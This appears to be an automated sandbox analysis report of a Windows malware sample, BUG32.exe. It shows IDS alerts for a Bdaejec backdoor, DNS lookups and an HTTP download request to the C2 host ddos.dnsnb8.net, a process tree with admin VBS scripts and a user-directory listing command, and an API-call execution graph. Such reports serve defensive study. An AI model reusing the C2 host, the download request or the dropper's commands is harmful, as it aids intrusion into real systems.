                          SHLWAPI.DLLPathQuoteSpacesA, PathRenameExtensionA, PathAddBackslashA, PathUnquoteSpacesA
                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                          2024-07-26T02:34:53.677362+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971252.165.165.26192.168.2.5
                          2024-07-26T02:34:34.160951+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5081753192.168.2.51.1.1.1
                          2024-07-26T02:34:37.851976+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49704799192.168.2.544.221.84.105
                          2024-07-26T02:34:35.176118+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5081753192.168.2.51.1.1.1
                          2024-07-26T02:35:34.422089+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973152.165.165.26192.168.2.5
                          2024-07-26T02:34:33.154123+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5081753192.168.2.51.1.1.1
                          TimestampSource PortDest PortSource IPDest IP
                          Jul 26, 2024 02:34:37.430155039 CEST49704799192.168.2.544.221.84.105
                          Jul 26, 2024 02:34:37.436122894 CEST7994970444.221.84.105192.168.2.5
                          Jul 26, 2024 02:34:37.436196089 CEST49704799192.168.2.544.221.84.105
                          Jul 26, 2024 02:34:37.437613010 CEST49704799192.168.2.544.221.84.105
                          Jul 26, 2024 02:34:37.446588993 CEST7994970444.221.84.105192.168.2.5
                          Jul 26, 2024 02:34:37.851856947 CEST7994970444.221.84.105192.168.2.5
                          Jul 26, 2024 02:34:37.851932049 CEST7994970444.221.84.105192.168.2.5
                          Jul 26, 2024 02:34:37.851975918 CEST49704799192.168.2.544.221.84.105
                          Jul 26, 2024 02:34:37.851975918 CEST49704799192.168.2.544.221.84.105
                          Jul 26, 2024 02:34:37.883642912 CEST49704799192.168.2.544.221.84.105
                          Jul 26, 2024 02:34:37.888595104 CEST7994970444.221.84.105192.168.2.5
                          TimestampSource PortDest PortSource IPDest IP
                          Jul 26, 2024 02:34:33.154123068 CEST5081753192.168.2.51.1.1.1
                          Jul 26, 2024 02:34:34.160950899 CEST5081753192.168.2.51.1.1.1
                          Jul 26, 2024 02:34:35.176117897 CEST5081753192.168.2.51.1.1.1
                          Jul 26, 2024 02:34:37.163301945 CEST53508171.1.1.1192.168.2.5
                          Jul 26, 2024 02:34:37.163326979 CEST53508171.1.1.1192.168.2.5
                          Jul 26, 2024 02:34:37.163337946 CEST53508171.1.1.1192.168.2.5
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 26, 2024 02:34:33.154123068 CEST192.168.2.51.1.1.10xe42cStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                          Jul 26, 2024 02:34:34.160950899 CEST192.168.2.51.1.1.10xe42cStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                          Jul 26, 2024 02:34:35.176117897 CEST192.168.2.51.1.1.10xe42cStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 26, 2024 02:34:37.163301945 CEST1.1.1.1192.168.2.50xe42cNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                          Jul 26, 2024 02:34:37.163326979 CEST1.1.1.1192.168.2.50xe42cNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                          Jul 26, 2024 02:34:37.163337946 CEST1.1.1.1192.168.2.50xe42cNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                          • ddos.dnsnb8.net:799
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.54970444.221.84.1057996164C:\Users\user\AppData\Local\Temp\aJEWGt.exe
                          TimestampBytes transferredDirectionData
                          Jul 26, 2024 02:34:37.437613010 CEST288OUTGET /cj//k1.rar HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: ddos.dnsnb8.net:799
                          Connection: Keep-Alive


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:20:34:31
                          Start date:25/07/2024
                          Path:C:\Users\user\Desktop\BUG32.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\BUG32.exe"
                          Imagebase:0x400000
                          File size:3'209'216 bytes
                          MD5 hash:88DE5895931431E3BDD22BADC8A5BF01
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:20:34:32
                          Start date:25/07/2024
                          Path:C:\Users\user\AppData\Local\Temp\aJEWGt.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\aJEWGt.exe
                          Imagebase:0xae0000
                          File size:15'872 bytes
                          MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:3
                          Start time:20:34:32
                          Start date:25/07/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\CB7D.tmp\CB7E.vbs
                          Imagebase:0x7ff61b650000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:20:34:34
                          Start date:25/07/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\wscript.exe" "C:\BUG32\admin.vbs"
                          Imagebase:0x7ff61b650000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:20:34:34
                          Start date:25/07/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministrator
                          Imagebase:0x7ff61b650000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:6
                          Start time:20:34:35
                          Start date:25/07/2024
                          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                          Imagebase:0x5d0000
                          File size:166'912 bytes
                          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:false

                          Target ID:7
                          Start time:20:34:35
                          Start date:25/07/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\cmd.exe" /c dir "C:\Users\user\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk"
                          Imagebase:0x7ff7293e0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:13.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:7.2%
                            Total number of Nodes:1696
                            Total number of Limit Nodes:18
                            execution_graph 6300 406f40 6301 406f4c 6300->6301 6302 406f65 6300->6302 6303 406f50 _stricmp 6301->6303 6304 406f5d 6301->6304 6305 4080c1 SendMessageA 6306 4022c3 6311 4076e0 6306->6311 6309 406fb0 20 API calls 6310 4022f9 6309->6310 6314 407680 6311->6314 6315 407690 6314->6315 6315->6315 6316 40d090 HeapReAlloc 6315->6316 6317 4022de 6316->6317 6317->6309 6318 407dc3 6319 407dd8 6318->6319 6320 407dee 6318->6320 6321 407e4f 6319->6321 6322 407de2 IsWindowEnabled 6319->6322 6323 407e40 6320->6323 6324 407e02 SetTextColor 6320->6324 6322->6320 6322->6321 6323->6321 6326 407e48 SetBkColor 6323->6326 6324->6323 6325 407e10 6324->6325 6327 407e2a GetSysColor SetBkColor 6325->6327 6328 407e1a GetSysColor SetBkColor 6325->6328 6326->6321 6329 407e38 GetSysColorBrush 6327->6329 6328->6329 6329->6323 6330 40b3c3 6331 40b3d0 6330->6331 6333 40b42a 6330->6333 6332 40b516 6 API calls 6331->6332 6331->6333 6336 40b3ee 6331->6336 6332->6336 6336->6333 6338 40b5d5 6336->6338 6347 40b43e 6336->6347 6362 40d44d 6336->6362 6339 40b603 6338->6339 6340 40b5e4 6338->6340 6341 40c5cb 4 API calls 6339->6341 6340->6339 6343 40b5f3 6340->6343 6346 40b601 6341->6346 6342 40b655 6342->6336 6345 40d72a HeapFree 6343->6345 6343->6346 6344 40b641 memset 6344->6342 6345->6346 6346->6342 6346->6344 6348 40b470 6347->6348 6349 40b44d 6347->6349 6352 40b5af tolower 6348->6352 6354 40b48b 6348->6354 6350 40b243 3 API calls 6349->6350 6351 40b456 6350->6351 6351->6348 6353 40b45c 6351->6353 6352->6354 6355 40b46e 6353->6355 6359 40d72a HeapFree 6353->6359 6356 40c5cb 4 API calls 6354->6356 6357 40b4f0 memset 6355->6357 6358 40b504 6355->6358 6360 40b4a2 6356->6360 6357->6358 6358->6336 6359->6355 6360->6358 6361 40b4a8 strlen HeapAlloc strcpy 6360->6361 6361->6355 6363 40d724 6362->6363 6366 40d465 6362->6366 6363->6336 6364 40d71c memcpy 6364->6363 6365 40d6d4 memcpy 6365->6366 6366->6365 6367 40d6fd 6366->6367 6368 40cf60 HeapFree 6366->6368 6369 40d44d HeapFree strlen HeapAlloc 6366->6369 6370 40cf90 2 API calls 6366->6370 6367->6363 6367->6364 6368->6366 6369->6366 6370->6366 6371 407c46 6372 407ca2 6371->6372 6373 407c56 6371->6373 6374 407c93 6373->6374 6375 407c6f SetTextColor 6373->6375 6374->6372 6377 407c9b SetBkColor 6374->6377 6375->6374 6376 407c7d GetSysColor SetBkColor GetSysColorBrush 6375->6376 6376->6374 6377->6372 6378 409ac8 fabs 6379 409ae2 6378->6379 6380 40834a 6381 40835e 6380->6381 6382 408351 6380->6382 6381->6382 6383 408371 DestroyWindow 6381->6383 6383->6382 6384 4023ca 6385 4023cc 6384->6385 6386 40cf60 HeapFree 6385->6386 6387 4023d4 6386->6387 6388 40cf60 HeapFree 6387->6388 6389 4023dd 6388->6389 6390 40cf60 HeapFree 6389->6390 6391 4023e6 6390->6391 6392 40abca 6393 40c495 9 API calls 6392->6393 6394 40abda 6393->6394 6395 40c5cb 4 API calls 6394->6395 6396 40abe6 6395->6396 6397 407b4b GetDC SendMessageA SelectObject GetWindowTextLengthA HeapAlloc 6398 407ba0 GetWindowTextA SetRect DrawTextA GetWindowLongA 6397->6398 6399 407c1e SelectObject ReleaseDC 6397->6399 6400 407c07 6398->6400 6401 407bef GetSystemMetrics GetSystemMetrics 6398->6401 6402 407c0d HeapFree 6400->6402 6401->6402 6402->6399 6403 402fcb 6404 402fcd 6403->6404 6405 40cf60 HeapFree 6404->6405 6406 402fd5 6405->6406 6407 40cbe5 2 API calls 6406->6407 6408 402fdf 6407->6408 6409 40cbe5 2 API calls 6408->6409 6410 402fe8 6409->6410 6411 40cbe5 2 API calls 6410->6411 6412 402ff1 6411->6412 6281 401d4c 6292 407660 SetUnhandledExceptionFilter 6281->6292 6283 401d51 6296 407b31 6283->6296 6285 401d56 6293 40990f FreeLibrary 6285->6293 6287 401d60 6294 40afbe KiUserCallbackDispatcher 6287->6294 6289 401d74 6295 40a1e0 HeapDestroy 6289->6295 6291 401d79 6292->6283 6293->6287 6294->6289 6295->6291 6297 407b3c 6296->6297 6298 407b43 DestroyWindow 6297->6298 6299 407b4a 6297->6299 6298->6299 6299->6285 6414 40cb4f 6417 40cb6c 6414->6417 6415 40cabd 4 API calls 6416 40cbb3 6415->6416 6417->6415 6418 40a250 6419 40a283 6418->6419 6420 40a258 6418->6420 6421 40a260 HeapAlloc 6420->6421 6422 40a271 HeapAlloc 6420->6422 6423 404ad0 6424 404aea CharLowerA 6423->6424 6425 404b8f 6423->6425 6427 404b01 6424->6427 6426 404b1f CharLowerA 6426->6427 6427->6426 6428 404b40 CharLowerA CharLowerA 6427->6428 6429 404b76 6427->6429 6428->6427 6430 4074d0 6432 4074da 6430->6432 6431 407502 6432->6431 6433 4074e9 GetCurrentProcess TerminateProcess 6432->6433 6433->6431 6434 4079d1 6435 4079de 6434->6435 6437 407a17 6434->6437 6436 407a20 4 API calls 6435->6436 6435->6437 6439 4079f0 6435->6439 6436->6439 6438 40780d 5 API calls 6438->6439 6439->6437 6439->6438 6440 40d44d 5 API calls 6439->6440 6440->6439 6441 4072d4 6442 4072e3 6441->6442 6443 4072e7 CloseHandle 6442->6443 6444 4072fe 6442->6444 6445 40c3cf 2 API calls 6443->6445 6445->6444 6446 407e58 6447 407e63 6446->6447 6448 407e7a CallWindowProcA 6447->6448 6450 40857b 6447->6450 6455 408548 6450->6455 6456 40856b GetParent 6455->6456 6457 408573 GetPropA GetWindowLongA 6456->6457 6458 408558 GetPropA 6456->6458 6460 40aea5 6457->6460 6458->6457 6459 408568 6458->6459 6459->6456 6461 40ad25 10 API calls 6460->6461 6462 4085ad 6461->6462 6462->6448 6463 4080dc GetDC SendMessageA SelectObject GetWindowTextLengthA HeapAlloc 6464 408137 GetWindowTextA GetTextExtentPoint32A GetSystemMetrics GetSystemMetrics 6463->6464 6465 40818e SelectObject ReleaseDC 6463->6465 6466 40817a 6464->6466 6467 40817d HeapFree 6464->6467 6466->6467 6467->6465 6468 406fdf 6469 406fe8 6468->6469 6470 40701d 6468->6470 6469->6470 6471 406fed SendMessageA Sleep PostMessageA 6469->6471 6471->6470 6472 409360 6481 408e65 6472->6481 6475 4093d1 SetLastError 6477 4093e3 DefWindowProcA 6475->6477 6478 4093bd 6475->6478 6476 409382 GetPropA 6476->6475 6480 409392 6476->6480 6477->6478 6479 4093c7 DefFrameProcA 6479->6478 6480->6478 6480->6479 6482 408e7b 6481->6482 6483 408e88 GetPropA 6482->6483 6485 408eac 6482->6485 6484 408e9c GetParent 6483->6484 6483->6485 6484->6483 6484->6485 6486 409241 6485->6486 6487 408f0e 6485->6487 6534 408eeb 6485->6534 6490 40924a 6486->6490 6492 409284 6486->6492 6495 4092c1 6486->6495 6488 408f14 6487->6488 6489 4091ad 6487->6489 6493 4090e0 6488->6493 6494 408f1d 6488->6494 6542 408def 6489->6542 6490->6492 6511 409116 6490->6511 6501 40aea5 10 API calls 6492->6501 6492->6534 6496 4090e9 6493->6496 6504 409186 6493->6504 6498 409087 6494->6498 6500 408f23 6494->6500 6495->6511 6520 4092eb 6495->6520 6502 409127 6496->6502 6503 4090ee 6496->6503 6497 4090b5 6509 40aea5 10 API calls 6497->6509 6498->6497 6506 409091 GetClientRect FillRect 6498->6506 6499 4091bc 6507 4091f3 6499->6507 6508 4091cc GetWindowLongA 6499->6508 6499->6534 6512 408f34 6500->6512 6513 408fcb 6500->6513 6539 408f37 6500->6539 6501->6534 6516 409140 GetWindowLongA 6502->6516 6502->6534 6510 4090f3 6503->6510 6503->6511 6505 409198 EnumChildWindows 6504->6505 6504->6534 6505->6534 6506->6497 6514 4091dc 6507->6514 6519 40920e 6507->6519 6508->6514 6509->6534 6515 4090fc RemovePropA 6510->6515 6510->6534 6518 408def 2 API calls 6511->6518 6511->6534 6517 408f64 6512->6517 6512->6539 6527 409036 6513->6527 6528 408fe6 6513->6528 6513->6534 6530 40aea5 10 API calls 6514->6530 6515->6534 6516->6534 6522 408f90 GetFocus SetPropA 6517->6522 6523 408f69 GetPropA 6517->6523 6518->6534 6545 409572 GetActiveWindow GetFocus IsChild 6519->6545 6521 40aea5 10 API calls 6520->6521 6529 40931e PostMessageA 6520->6529 6531 40931b 6521->6531 6526 40967a 2 API calls 6522->6526 6524 408f82 6523->6524 6525 408f7b SetFocus 6523->6525 6535 40aea5 10 API calls 6524->6535 6525->6524 6526->6524 6537 40aea5 10 API calls 6527->6537 6527->6539 6536 408ff5 6528->6536 6528->6539 6529->6534 6530->6534 6531->6529 6532 40aea5 10 API calls 6532->6534 6534->6475 6534->6476 6535->6534 6538 40aea5 10 API calls 6536->6538 6537->6539 6540 40900d 6538->6540 6539->6532 6539->6534 6541 40aea5 10 API calls 6540->6541 6541->6534 6543 408dfe GetPropA GetWindowLongA 6542->6543 6544 408e1e 6542->6544 6543->6544 6544->6499 6546 409622 6545->6546 6558 4095a5 6545->6558 6549 409630 EnumChildWindows 6546->6549 6550 409653 EnumChildWindows 6546->6550 6547 4095ae GetClassNameA strcmp 6548 4095db strcmp 6547->6548 6547->6558 6554 4095fe strcmp 6548->6554 6555 4095ef GetWindowLongA 6548->6555 6551 409673 6549->6551 6556 409643 6549->6556 6550->6551 6552 409669 EnumChildWindows 6550->6552 6551->6534 6552->6551 6553 409615 GetParent 6553->6546 6553->6547 6554->6553 6554->6558 6555->6553 6555->6558 6556->6551 6557 409648 SetFocus 6556->6557 6557->6551 6558->6546 6558->6547 6558->6553 6559 401562 6561 40153d 6559->6561 6560 408de7 34 API calls 6560->6561 6561->6560 6562 40154d RemoveDirectoryA 6561->6562 6566 401581 6561->6566 6567 4015c9 6561->6567 6563 401d32 ExitProcess 6562->6563 6742 40ce20 HeapFree HeapDestroy 6563->6742 6565 401d3c HeapDestroy ExitProcess 6568 4082e4 4 API calls 6566->6568 6569 4082e4 4 API calls 6567->6569 6570 401593 6568->6570 6571 4015db 6569->6571 6572 40ce50 2 API calls 6570->6572 6573 40ce50 2 API calls 6571->6573 6574 40159d 6572->6574 6575 4015e5 6573->6575 6576 408783 19 API calls 6574->6576 6577 408783 19 API calls 6575->6577 6578 4015a7 6576->6578 6577->6578 6579 40b6a0 2 API calls 6578->6579 6580 40161a 6579->6580 6581 40a1f0 2 API calls 6580->6581 6582 401639 6581->6582 6583 401654 6582->6583 6584 40167f 6582->6584 6585 406fb0 20 API calls 6583->6585 6586 402c3b 7 API calls 6584->6586 6587 40166a RemoveDirectoryA 6585->6587 6588 40168f 6586->6588 6587->6563 6589 402d4e 29 API calls 6588->6589 6590 4016d8 6589->6590 6591 40a1f0 2 API calls 6590->6591 6592 4016f1 6591->6592 6593 40ce50 2 API calls 6592->6593 6594 4016fb 6593->6594 6595 402c3b 7 API calls 6594->6595 6596 40170b 6595->6596 6597 40188a 6596->6597 6599 4073f1 3 API calls 6596->6599 6598 40cf00 2 API calls 6597->6598 6600 40189b 6598->6600 6601 401725 6599->6601 6602 40cf00 2 API calls 6600->6602 6603 40a1f0 2 API calls 6601->6603 6604 4018a5 6602->6604 6608 401744 6603->6608 6605 40cf00 2 API calls 6604->6605 6606 4018b0 6605->6606 6607 40ce50 2 API calls 6606->6607 6609 4018ba 6607->6609 6608->6597 6611 40177b 6608->6611 6610 404100 2 API calls 6609->6610 6612 4018cc 6610->6612 6613 40a395 2 API calls 6611->6613 6615 40ce50 2 API calls 6612->6615 6614 401790 6613->6614 6616 407023 30 API calls 6614->6616 6617 4018d6 6615->6617 6618 4017ab 6616->6618 6619 40cf00 2 API calls 6617->6619 6620 40ce50 2 API calls 6618->6620 6621 4018fd 6619->6621 6622 4017b5 6620->6622 6623 40cf00 2 API calls 6621->6623 6627 401838 6622->6627 6629 40cf00 2 API calls 6622->6629 6624 401907 GetTempFileNameA 6623->6624 6625 40a48b 2 API calls 6624->6625 6626 40192c PathRenameExtensionA 6625->6626 6628 40cf00 2 API calls 6626->6628 6630 407452 4 API calls 6627->6630 6631 40194d 6628->6631 6632 4017d5 6629->6632 6633 401853 6630->6633 6634 40ce50 2 API calls 6631->6634 6635 40ce50 2 API calls 6632->6635 6636 40a3e7 2 API calls 6633->6636 6637 401957 6634->6637 6638 4017df 6635->6638 6639 401861 6636->6639 6640 40a8a0 8 API calls 6637->6640 6641 40a3d5 SetCurrentDirectoryA 6638->6641 6642 40a3d5 SetCurrentDirectoryA 6639->6642 6643 401967 6640->6643 6651 4017ea 6641->6651 6644 40186f RemoveDirectoryA 6642->6644 6645 40196b 6643->6645 6646 40198d 6643->6646 6644->6563 6647 40aa20 6 API calls 6645->6647 6648 40a48b 2 API calls 6646->6648 6652 401981 6647->6652 6649 401998 6648->6649 6653 402ffb 9 API calls 6649->6653 6650 401804 6655 40a8a0 8 API calls 6650->6655 6651->6650 6654 40251c 84 API calls 6651->6654 6656 40a680 5 API calls 6652->6656 6657 40199d 6653->6657 6654->6650 6658 401814 6655->6658 6663 40198b 6656->6663 6659 406fb0 20 API calls 6657->6659 6658->6627 6661 40aa20 6 API calls 6658->6661 6660 4019b3 RemoveDirectoryA 6659->6660 6660->6563 6662 40182e 6661->6662 6664 40a680 5 API calls 6662->6664 6665 4019e2 6663->6665 6666 40251c 84 API calls 6663->6666 6664->6627 6667 404100 2 API calls 6665->6667 6666->6665 6668 4019f4 6667->6668 6669 40ce50 2 API calls 6668->6669 6670 4019fe 6669->6670 6671 407452 4 API calls 6670->6671 6672 401a1c GetShortPathNameA 6671->6672 6673 407452 4 API calls 6672->6673 6674 401a49 6673->6674 6675 4074ad SetEnvironmentVariableA 6674->6675 6676 401a63 6675->6676 6677 407452 4 API calls 6676->6677 6678 401a84 6677->6678 6679 40a541 2 API calls 6678->6679 6680 401a92 6679->6680 6681 4074ad SetEnvironmentVariableA 6680->6681 6682 401aac 6681->6682 6683 407452 4 API calls 6682->6683 6684 401acd 6683->6684 6685 40a3e7 2 API calls 6684->6685 6686 401adb 6685->6686 6687 4074ad SetEnvironmentVariableA 6686->6687 6688 401af5 6687->6688 6689 404200 HeapReAlloc 6688->6689 6690 401b14 6689->6690 6691 4074ad SetEnvironmentVariableA 6690->6691 6692 401b2e 6691->6692 6693 4074ad SetEnvironmentVariableA 6692->6693 6694 401b44 6693->6694 6695 404390 HeapReAlloc 6694->6695 6696 401b5f 6695->6696 6697 4074ad SetEnvironmentVariableA 6696->6697 6698 401b79 PathQuoteSpacesA 6697->6698 6699 402c07 GetNativeSystemInfo 6698->6699 6700 401b8f 6699->6700 6701 401b98 6700->6701 6702 40866f 2 API calls 6700->6702 6703 401c15 6701->6703 6704 401bac 6701->6704 6702->6701 6706 404100 2 API calls 6703->6706 6705 404100 2 API calls 6704->6705 6708 401bbe 6705->6708 6707 401c27 6706->6707 6709 40ce50 2 API calls 6707->6709 6710 40ce50 2 API calls 6708->6710 6711 401c31 GetSystemDirectoryA PathAddBackslashA 6709->6711 6712 401bc8 GetWindowsDirectoryA PathAddBackslashA 6710->6712 6713 401c4c 6711->6713 6714 40cf00 2 API calls 6712->6714 6715 40cf00 2 API calls 6713->6715 6716 401bf4 6714->6716 6717 401c63 6715->6717 6718 40cf00 2 API calls 6716->6718 6719 40cf00 2 API calls 6717->6719 6720 401bfe 6718->6720 6721 401c6d 6719->6721 6722 40ce50 2 API calls 6720->6722 6723 40cf00 2 API calls 6721->6723 6724 401c08 PathAddBackslashA 6722->6724 6725 401c78 6723->6725 6724->6713 6726 40cf00 2 API calls 6725->6726 6727 401c95 6726->6727 6728 40cf00 2 API calls 6727->6728 6729 401c9f 6728->6729 6730 40230c 7 API calls 6729->6730 6731 401cb7 6730->6731 6732 402ffb 9 API calls 6731->6732 6733 401cc7 PathUnquoteSpacesA 6732->6733 6734 40a48b 2 API calls 6733->6734 6735 401cdd 6734->6735 6736 407452 4 API calls 6735->6736 6737 401cf8 6736->6737 6738 40a3e7 2 API calls 6737->6738 6739 401d06 6738->6739 6740 40a3d5 SetCurrentDirectoryA 6739->6740 6741 401d14 RemoveDirectoryA 6740->6741 6741->6563 6742->6565 6743 407ee4 6 API calls 6744 407f52 SelectObject ReleaseDC 6743->6744 6745 407f4f 6743->6745 6745->6744 6746 40abe7 6747 40c851 9 API calls 6746->6747 6748 40abf2 6747->6748 6749 4099ea 6750 4099ef fabs 6749->6750 6751 409a07 6750->6751 6752 404a70 6753 404a7b 6752->6753 6756 404a80 6752->6756 6754 404a99 CharLowerA CharLowerA 6755 404abf 6754->6755 6754->6756 6756->6754 6756->6755 6252 40ab79 6253 40abb5 DefWindowProcA 6252->6253 6254 40ab8b 6252->6254 6257 40ad25 6254->6257 6258 40ad37 6257->6258 6259 40ad42 EnterCriticalSection 6258->6259 6264 40ad4d 6258->6264 6259->6264 6260 40ae65 6261 40aba3 HeapFree 6260->6261 6262 40ae98 LeaveCriticalSection 6260->6262 6261->6253 6262->6261 6263 40c5cb 4 API calls 6265 40ada0 6263->6265 6264->6260 6264->6263 6264->6265 6265->6260 6266 40acda 4 API calls 6265->6266 6267 40ae31 6266->6267 6268 40acda 4 API calls 6267->6268 6269 40ae41 6268->6269 6270 40acda 4 API calls 6269->6270 6271 40ae4c 6270->6271 6272 40acda 4 API calls 6271->6272 6273 40ae55 6272->6273 6274 40acda 4 API calls 6273->6274 6274->6260 6757 40837c 6758 408391 6757->6758 6762 408389 6757->6762 6759 4083c0 RedrawWindow 6758->6759 6760 4083a4 6758->6760 6764 408620 EnterCriticalSection 6758->6764 6760->6762 6770 4085b3 EnterCriticalSection 6760->6770 6762->6759 6765 408636 6764->6765 6766 408663 LeaveCriticalSection 6765->6766 6767 40864c DeleteObject 6765->6767 6769 408645 6765->6769 6766->6760 6768 40ca7d HeapFree 6767->6768 6768->6769 6769->6766 6771 4085cf 6770->6771 6772 408611 LeaveCriticalSection 6771->6772 6773 40ca50 HeapAlloc 6771->6773 6772->6762 6774 4085f3 6773->6774 6775 408610 6774->6775 6776 4085fb CreateSolidBrush 6774->6776 6775->6772 6776->6775 6777 4083fc 6778 408407 6777->6778 6779 40840d 6777->6779 6780 408620 4 API calls 6778->6780 6780->6779 6781 40ccfd 6782 40cd10 6781->6782 6789 40cda5 6781->6789 6783 40cd45 6782->6783 6784 40cabd 4 API calls 6782->6784 6782->6789 6785 40cd6b 6783->6785 6786 40cd4f memcpy 6783->6786 6784->6783 6787 40cda7 memcpy 6785->6787 6788 40cd7c 6785->6788 6785->6789 6786->6785 6787->6789 6788->6789 6790 40d44d 5 API calls 6788->6790 6790->6788 6791 407a7e HeapAlloc 5014 401000 memset GetModuleHandleA HeapCreate 5015 401044 5014->5015 5315 40cdd0 HeapCreate HeapAlloc 5015->5315 5017 401049 5316 40abf3 memset RegisterClassA CreateWindowExA RegisterWindowMessageA 5017->5316 5023 401062 5327 40a1c0 HeapCreate 5023->5327 5025 401067 5328 40a1a2 5025->5328 5033 40107b 5349 407ac1 InitializeCriticalSection GetStockObject 5033->5349 5035 401080 5354 407301 5035->5354 5037 40108a 5359 406f79 memset InitCommonControlsEx CoInitialize 5037->5359 5039 40108f 5360 4077a5 5039->5360 5045 4010d3 5381 40b0e2 5045->5381 5048 4077a5 16 API calls 5049 4010fd 5048->5049 5050 4076f4 11 API calls 5049->5050 5051 401118 5050->5051 5392 404068 5051->5392 5054 404068 4 API calls 5055 401138 5054->5055 5056 404068 4 API calls 5055->5056 5057 401148 5056->5057 5058 404068 4 API calls 5057->5058 5059 401158 5058->5059 5060 404068 4 API calls 5059->5060 5061 401168 5060->5061 5062 404068 4 API calls 5061->5062 5063 401178 5062->5063 5064 404068 4 API calls 5063->5064 5065 401188 5064->5065 5066 404068 4 API calls 5065->5066 5067 401198 5066->5067 5068 404068 4 API calls 5067->5068 5069 4011a8 5068->5069 5070 404068 4 API calls 5069->5070 5071 4011b8 5070->5071 5395 40866f GetVersionExA 5071->5395 5074 4011c4 5632 406fb0 5074->5632 5075 4011df 5400 407510 5075->5400 5078 4011eb 5406 40743f 5078->5406 5081 401d32 ExitProcess 5631 40ce20 HeapFree HeapDestroy 5081->5631 5082 4012e4 5410 402c3b 5082->5410 5085 401d3c HeapDestroy ExitProcess 5087 4012f8 5419 4023ee 5087->5419 5088 40130f 5091 406fb0 20 API calls 5088->5091 5093 4011da 5091->5093 5093->5081 5094 40ce50 RtlAllocateHeap HeapReAlloc 5108 401212 5094->5108 5095 402c3b 7 API calls 5096 40133f 5095->5096 5097 401343 5096->5097 5098 401368 5096->5098 5446 40a1f0 5097->5446 5101 406fb0 20 API calls 5098->5101 5100 40129d PathQuoteSpacesA 5103 40cf00 2 API calls 5100->5103 5101->5093 5102 40135c 5453 40ce50 5102->5453 5103->5108 5105 401366 5107 402c3b 7 API calls 5105->5107 5106 40cf00 strlen HeapReAlloc 5106->5108 5109 401398 5107->5109 5108->5082 5108->5094 5108->5100 5108->5106 5639 4073f1 5108->5639 5110 4013bc 5109->5110 5111 40139c 5109->5111 5112 406fb0 20 API calls 5110->5112 5113 402c3b 7 API calls 5111->5113 5112->5093 5114 4013ec 5113->5114 5115 402c3b 7 API calls 5114->5115 5116 40141e 5115->5116 5117 402c3b 7 API calls 5116->5117 5120 401450 5117->5120 5118 4016d8 5119 40a1f0 2 API calls 5118->5119 5121 4016f1 5119->5121 5120->5118 5122 401487 5120->5122 5123 401467 